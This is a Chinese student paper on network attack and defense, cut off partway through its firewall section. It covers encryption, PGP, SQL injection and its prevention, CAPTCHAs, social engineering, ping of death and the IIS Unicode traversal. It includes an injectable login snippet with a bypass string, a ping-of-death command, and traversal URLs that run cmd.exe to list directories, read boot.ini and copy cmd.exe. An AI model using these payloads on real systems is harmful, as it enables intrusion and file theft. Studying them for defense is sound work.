关于网络防御与攻击论文.docx
《关于网络防御与攻击论文.docx》由会员分享,可在线阅读,更多相关《关于网络防御与攻击论文.docx(19页珍藏版)》请在冰点文库上搜索。
关于网络防御与攻击论文
目录
摘要......................................................2
第一节威胁网络安全的因素.................................2
第二节加密技术...........................................4
2.1对称加密算法..........................................4
2.2非对称加密算法........................................4
2.3不可逆加密算法........................................5
2.4PGP加密技术...........................................6
第三节网络防御...........................................9
3.1防范SQL注入攻击......................................9
3.2验证码技术............................................9
第四节网络攻击..........................................10
4.1社会工程学攻击........................................10
4.2Pingofdeath攻击....................................10
4.3Unicode漏洞攻击...................................11
第五节防火墙技术........................................13
5.1防火墙的定义..........................................13
5.2防火墙的功能.........................................14
5.3防火墙的必要性........................................14
5.4防火墙的优缺点........................................14
结论.....................................................16
附录.....................................................16
参考文献.................................................17
摘要:
随着计算机网络的不断发展,全球信息化已成为人类发展的大趋势。
但由于计算机网络具有联结形式多样性、终端分布不均匀性和网络的开放性、互连性等特征,致使网络易受黑客、怪客、恶意软件和其他不轨的攻击,所以网上信息的安全和保密是一个至关重要的问题。
无论是在局域网还是在广域网中,都存在着自然和人为等诸多因素的脆弱性和潜在威胁。
故此,网络的安全措施应是能全方位地针对各种不同的威胁和脆弱性,这样才能确保网络信息的保密性、完整性和可用性。
关键字:
网络威胁加密技术网络防御网络攻击防火墙
Abstract:
Alongwiththecomputernetworkunceasingdevelopment,theglobalinformationhasbecomethedevelopmentofthehumanracethemajortendency.Butbecausethecomputernetworkhasjointformcharacteristicsandsoonmultiplicity,terminaldistributionnon-uniformityandnetworkopenness,connectivity,causenetworkeasilyhacker,strangeguest,malicioussoftwareandotherillegalattacks,thereforeonthenettheinformationsecurityandthesecurityareaveryimportantquestion.
RegardlessofisinthelocalareanetworkorinWAN,allhasthenatureandartificialandsoonmanyfactorvulnerabilitiesandthelatentthreat.Therefore,thenetworksecuritymeasureshouldbecanOmni-directionalinviewofeachkindofdifferentthreatandthevulnerability,likethiscanguaranteethenetworkinformationthesecrecy,theintegrityandtheusability.
Keyword:
NetworkthreatEncryptiontechnologyNetworkdefense
NetworkattackFirewall
一、威胁网络安全的因素
威胁网络安全的因素从大类上主要分为2类:
环境因素和人为因素。
环境因素主要表现形式为:
断电、静电、灰尘、潮湿、温度、鼠蚁虫害、电磁干扰、洪灾、火灾、地震等环境条件或自然灾害,意外事故或软件、硬件、数据、通信线路方面的故障。
而人为因素又可以分为两小类:
恶意和非恶意。
恶意人员:
不满的或有预谋的内部人员对信息系统进行恶意破坏,采用自主或内外勾结的方式盗窃机密信息或进行篡改,以获取利益;外部人员利用信息系统的脆弱性,对网络或系统的机密性、完整性和可用性进行破坏,以获取利益或炫耀能力。
非恶意人员:
内部人员由于缺乏责任心,或者由于不关心和不专注,或者没有遵循规章制度和操作流程而导致故障或信息损坏;内部人员由于缺乏培训,专业技能不足,不具备岗位技能要求而导致信息系统故障或被攻击。
环境因素自然界和人类活动对信息与通信网有意无意的侵犯、攻击与破坏。
唐山市发生的地震对全国人民来说,是一件极其痛心的事,也是一次学会观测地震与抗震的大动员。
唐山大地震时,包括政府、机关、电信局(站)以及商店民房全都变成瓦砾,对外一切联系中断。
当时向外发出的第一个“救灾”请求的,是唐山郊外地下干线电缆通信站。
该站虽在唐山郊外,但离市区仅几公里,由于是在地下就安然无恙,还可以肯定地下电缆也是完好的,否则求救电话怎能到达北京(需要补充说一下,远离唐山100km~200km的天津市、北京郊区的老民房却发生了不少倒塌)。
因此,我们可以说,为了确保信息与通信网的安全,所建主要节点以上的局(站),要远离地震中心(包括理论的、调研的、曾经发生过大地震的),要提升建筑物防震的等级,一般局(站)也要执行防震等级。
机房中的所有设备、系统都要防震加固。
所有核心网的光缆,本地网的主干光缆,有一定容量的光/电缆都应走地下路由。
笔者认为:
在我国经济实力逐年提高的今天,在信息与通信网的建设中进一步强调抗震的力度,加强信息与通信网的安全一性是至关重要的。
随着文明的不断进步和科技的发展,人类对于改善环境条件和防御自然灾害的能力会慢慢趋向成熟。
人为因素一直都是威胁网络安全的最大因素,因为人是最不稳定的因素,任何事情只要加入了人的因素就没有绝对的确定性。
科技的进步也代表了人的进步所以,世界上没有完美的事物也就代表了没有完美的防御,也就是不管科技怎么发展也都还有突破口,那么黑客既有能力进入你的网络。
即使在理论上虚拟网络中有完美的防御,而有人能在现实中拿到他想要的,那网络的安全几乎为零,社会工程学不管在虚拟网络还是现实中都是很危险的而掌握社会工程学的是人,因此人为因素是威胁网络安全的最大因素也是永久因素。
二、加密技术
加密技术:
即是对信息进行编码和解码的技术,编码是把原来可读信息(又称明文)译成代码形式(又称密文),其逆过程就是解码(解码)。
加密技术的要点是加密算法,加密算法可以分为对称加密、非对称加密和不可逆加密三类算法。
2.1对称加密算法
在对称加密算法中,数据发信方将明文(原始数据)和加密密钥一起经过特殊加密算法处理后,使其变成复杂的加密密文发送出去。
收信方收到密文后,若想解读原文,则需要使用加密用过的密钥及相同算法的逆算法对密文进行解密,才能使其恢复成可读明文。
如图所示:
在对称加密算法中,使用的密钥只有一个,发收信双方都使用这个密钥对数据进行加密和解密,这就要求解密方事先必须知道加密密钥。
对称加密算法的特点是:
算法公开;计算量小;加密速度快;加密效率高。
不足之处是:
交易双方都使用同样的密钥,安全性得不到保证;每对用户每次使用对称加密算法时,都需要使用其他人不知道的惟一密钥,这会使得发收信双方所拥有的密钥数量成几何级数增长,密钥管理成为用户的负担。
对称算法的加密和解密表示为:
EK(M)=C
DK(C)=M
2.2非对称加密算法(公开密钥算法)
非对称加密算法使用两把完全不同但又是完全匹配的一对钥匙——公钥和私钥。
在使用非对称加密算法加密文件时,只有使用匹配的一对公钥和私钥,才能完成对明文的加密和解密过程。
公钥和私钥:
公钥就是公布出来,所有人都知道的密钥,它的作用是供公众使用。
私钥则是只有拥有者才知道的密钥。
加密明文时采用公钥加密,解密密文时使用私钥才能完成,而且发信方(加密者)知道收信方的公钥,只有收信方(解密者)才是惟一知道自己私钥的人。
如下图:
非对称加密算法的基本原理是:
(1)如果发信方想发送只有收信方才能解读的加密信息,发信方必须首先知道收信方的公钥,然后利用收信方的公钥来加密原文。
(2)收信方收到加密密文后,使用自己的私钥才能解密密文。
显然,采用非对称加密算法,收发信双方在通信之前,收信方必须将自己早已随机生成的公钥送给发信方,而自己保留私钥。
非对称算法的公开密钥K1加密表示为:
EK1(M)=C。
公开密钥和私人密钥是不同的,用相应的私人密钥K2解密可表示为:
DK2(C)=M。
广泛应用的非对称加密算法有RSA算法和美国国家标准局提出的数字签名算法DSA。
由于非对称算法拥有两个密钥,因而特别适用于分布式系统中的数据加密。
DES(DataEncryptionStandard)算法,是一种用56位密钥来加密64位数据的方法。
RSA算法是第一个能同时用于加密和数字签名的算法。
根据RSA算法的原理,可以利用C语言实现其加密和解密算法。
RSA算法比DES算法复杂,加解密的所需要的时间也比较长。
2.3不可逆加密算法
不可逆加密算法的特征是:
加密过程中不需要使用密钥,输入明文后,由系统直接经过加密算法处理成密文,这种加密后的数据是无法被解密的,只有重新输入明文,并再次经过同样不可逆的加密算法处理,得到相同的加密密文并被系统重新识别后,才能真正解密。
显然,在这类加密过程中,加密是自己,解密还得是自己,而所谓解密,实际上就是重新加一次密,所应用的“密码”也就是输入的明文。
不可逆加密算法不存在密钥保管和分发问题,非常适合在分布式网络系统上使用,但因加密计算复杂,工作量相当繁重,通常只在数据量有限的情形下使用,如广泛应用在计算机系统中的口令加密,利用的就是不可逆加密算法。
2.4PGP加密技术
本例介绍目前常用的加密工具PGP,使用PGP产生密钥,加密文件和邮件。
PGP加密技术是一个基于RSA公钥加密体系的邮件加密软件,提出了公共钥匙或不对称文件的加密技术。
由于RSA算法计算量极大,在速度上不适合加密大量数据,所以PGP实际上用来加密的不是RSA本身,而是采用传统加密算法IDEA,IDEA加解密的速度比RSA快得多。
PGP随机生成一个密钥,用IDEA算法对明文加密,然后用RSA算法对密钥加密。
收件人同样是用RSA解出随机密钥,再用IEDA解出原文。
2.4.1.使用PGP加密文件
使用PGP可以加密本地文件,右击要加密的文件,选择PGP菜单项的菜单“Encrypt”,如下图所示:
系统自动出现对话框,让用户选择要使用的加密密钥,选中一个密钥,点击按钮“OK”,如下图所示:
目标文件被加密了,在当前目录下自动产生一个新的文件,如图所示:
打开加密后的文件时,程序自动要求输入密码,输入建立该密钥时的密码。
如图:
2.4.2使用PGP加密邮件
PGP的主要功能是加密邮件,安装完毕后,PGP自动和Outlook或者OutlookExpress关联。
和OutlookExpress关联如图所示:
利用Outlook建立邮件,可以选择利用PGP进行加密和签名,如图所示:
三、网络防御
在当今网络系统开发中,不注意网络防范问题,就会遭到黑客的攻击,甚至会使整个系统崩溃。
因此,在开发中我们注意网络攻击问题,以免让黑客有机可趁。
虽然黑客攻击的手段防不胜防,但我们应该把所知道的防范措施做好,例如:
防范SQL注入式攻击,验证码技术等。
3.1防范SQL注入攻击
Sql注入式攻击是指利用设计上的漏洞,在目标服务器上运行Sql命令以及进行其他方式的攻击动态生成Sql命令时没有对用户输入的数据进行验证是Sql注入攻击得逞的主要原因。
3.1.1SQL的注入式攻击
比如以在线书店为例,用户只有登陆后才能察看自己的帐户信息,这样做是无可置疑的,然而用户验证的代码如下
//id和password直接来自用户的输入。
未做处理
stringid=GetUserInput("UserID");
stringpassword=GetUserInput("UserPassword");
tringscript="select*fromtable_userwhereUser_ID='"+id?
+"'andUser_Password?
='"+password?
+"'";
RunSql(script);
如果用户输入的password为“or''='”,那么生成的script就为
select*fromtable_userwhereUser_ID='UserID'andUser_Password?
=''or''=''
这样一来,即使不知道用户的密码也可以察看该用户的帐户信息了
从上面的这些例子可以看出,使用SQL注入式攻击可以得到用户的账户信息,不过SQL注入式攻击不只是那么简单,黑客还可能利用其它系统设计漏洞。
比如黑客设计一些SQL语句诱导系统程序把数据库返回的错误信息显示出来。
还有对数据库访问权限的设计不当,给与每一个数据库连接太多的权限,甚至dbo或sa的权限,也是sql注入式攻击利用的主要漏洞之一。
3.1.2防范sql注入式攻击
第一点最小权限原则
特别是不要用dbo或者sa账户,为不同的类型的动作或者组建使用不同的账户,最小权限原则适用于所有与安全有关的场合。
第二点对用户输入进行检查
对一些特殊字符,比如单引号,双引号,分号,逗号,冒号,连接号等进行转换或者过滤;使用强数据类型,比如你需要用户输入一个整数,就要把用户输入的数据转换成整数形式;限制用户输入的长度等等。
这些检查要放在server运行,client提交的任何东西都是不可信的。
第三点使用存储过程
如果一定要使用sq语句,那么用标准的方式组建sql语句,比如可以利用parameters对象,避免用字符串直接拼sq命令。
当sql运行出错时,不要把数据库返回的错误信息全部显示给用户,错误信息经常会透露一些数据库设计的细节
针对常用的sql注入式攻击方式对症下药
3.2验证码技术
所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素,由用户肉眼识别其中的验证码信息,输入表单提交网站验证,验证成功后才能使用某项功能。
3.2.1为什么使用验证码技术
防止不法用户用软件频繁注册,频繁发送不良信息。
例如:
普遍的客户端交互如留言本、会员注册等仅是按照要求输入内容,但网上有很多攻击软件,如注册机,可以通过浏览WEB,扫描表单,然后在系统上频繁注册,频繁发送不良信息,造成不良的影响,或者通过软件不断的尝试,盗取你的密码。
而我们使用通过使用验证码技术,使客户端输入的信息都必须经过验证。
3.2.2测试验证码是否完善
必须保证所有客户端交互部分都输入验证码,测试提交信息时不输入验证码,或者故意输入错误的验证码,如果信息都不能交,说明验证码有效,同时在验证码输入正确下提交信息,如果能提交,说明验证码功能已完善。
上面仅介绍了两种必须注意的安全问题,在开发系统中无论你使用ASP、JSP或者其它技术,都要注意网络攻击问题,然后进行防御。
四、网络攻击
对网络信息系统的攻击来自很多方面,这些攻击可以宏观地为人为攻击和自然灾害攻击。
他们都会对通信安全构成威胁,但是精心设计的人为攻击威胁最大,也最难防备。
4.1社会工程学攻击
社交工程是使用计谋和假情报去获得密码和其他敏感信息的科学,研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体,因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。
举个例子:
一组高中学生曾经想要进入一个当地的公司的计算机网络,他们拟定了一个表格,调查看上去显得是无害的个人信息,例如所有秘书和行政人员和他们的配偶、孩子的名字,这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。
利用这份表格这些学生能够快速的进入系统,因为网络上的大多数人是使用宠物和他们配偶名字作为密码。
4.1.2攻击方式
(1)打电话请求密码。
尽管这个方式很普通,但打电话询问密码也经常奏效。
在社会工程中那些黑客冒充失去密码的合法雇员,经常通过这种简单的方法重新获得密码。
(2)伪造Email
使用telnet,一个黑客可以截取任何一个身份证发送Email的全部信息,这样的Email消息是真,因为它发自于一个合法的用户。
在这种情形下这些信息显得是绝对的真实。
黑客可以伪造这些。
一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息,黑客就能实施他们的恶意阴谋。
4.2.Pingofdeath攻击
Ping是潜水艇人员的专用术语,表示回应的声纳脉冲,在网络中ping是一个十分好用的TCP/IP工具。
它主要的功能是用来检测网络的连通情况和分析网路速度。
Ping有善的一面也有恶的一面。
4.2.1攻击方式
对目标IP不停地Ping探测从而致使目标主机TCP/IP堆栈崩溃导致网络瘫痪。
Ping–t–l65550
4.3Unicode漏洞攻击
4.3.1Unicode漏洞描述
攻击者可通过IE浏览器远程运行被攻击计算机的cmd.exe文件,从而使该计算机的文件暴露,且可随意执行和更改文件。
Unicode标准被很多软件开发者所采用,无论何种平台、程序或开发语言,Unicode均为每个字符提供独一无二的序号,如向IIS服务器发出包括非法Unicode
UTF-8序列的URL,攻击者可使服务器逐字“进入或退出”目录并执行任意程序,该攻击即称为目录转换攻击。
Unicode用“%2f”和“%5c”分别代表“/”和“\”字符,但也可用“超长”序列来代替这些字符。
“超长”序列是非法的Unicode表示符,如用“%c0%af”代表“/”字符。
由于IIS不对超长序列进行检查,因此在URL中添加超长的Unicode序列后,可绕过微软的安全检查,如在一个标记为可执行的文件夹发出该请求,攻击者即可在服务器上运行可执行文件。
4.3.2利用Unicode漏洞进行攻击
此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。
在NT4中/编码为“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。
但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。
⏹%c1%pc
⏹%c0%9v
⏹%c0%qf
⏹%c1%8s
⏹%e0%80%af
4.3.3利用Unicode漏洞读取系统盘目录
利用该漏洞读取出计算机上目录列表,比如读取C盘的目录,只要在浏览器中输入
⏹“http:
//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?
/c+dir+c:
\”
4.3.4利用Unicode漏洞读取系统文件
利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。
使用的语句是:
http:
//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?
/c+type+c:
\boot.ini
执行的结果如图所示:
4.3.5利用Unicode漏洞拷贝文件
为了是使用方便,利用语句将cmd.exe文件拷贝到scripts目录,并改名为c.exe,使用的语句是:
http:
//172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?
/c+copy+C:
\winnt\system32\cmd.exe+c.exe
执行结果如图所示:
五、防火墙技术
5.1防火墙的定义
在互联网上,防火墙是一种非常有效的网络安全系统,通过它可以隔离风险区域(Internet或有一定风险的网络)与安全区域(局域网)的连接,同时不会妨碍安全区域对风险区域的访问,网络防火墙结构如图所示。
5.2防火墙的功能
根据不同的需要,防火墙的功能有比较大差异,但是一般都包含以下三种基本功能。
(1)可以限制未授权的用户进入内部网络,过滤掉不安全的服务和非法用户
(2)防止入侵者接近网络防御设施
(3)限制内部用户访问特殊站点
由于防火墙假设了网络边界和服务,因此适合于相对独立的网络,例如Intranet等种类相对集中的网络。
Internet上的Web网站中,超过三分之一的站点都是有某种防火墙保护的,任何关键性的服务器,都应该放在防火墙之后。
5.3防火墙的必要性
随着世界各国信息基础设施的逐渐形成,国与国之间变得“近在咫尺”。
Internet已经成为信息化社会发展的重要保证。
已深入到国家的政治、军事、经济、文教等诸多领域。
许多重要的政府宏观调控决策、商业经济信息、银行资金转账、股票证券、能源资源数据、科研数据等重要信息都通过网络存贮、传输和处理。
因此,难免会遭遇各种主动或被动的攻击。
例如信息泄漏、信息窃取、数据篡改、数据删除和计算机病毒等。
因此,网络安全已经成为迫在眉睫的重要问题,没有网络安全就没有社会信息化.
5.4防火墙的分类
常见的放火墙有三种类型:
1、分组过滤防火墙;2、应用代理防火墙;3、状态检测防火墙。
分组过滤(PacketFiltering):
作用在协
升级会员 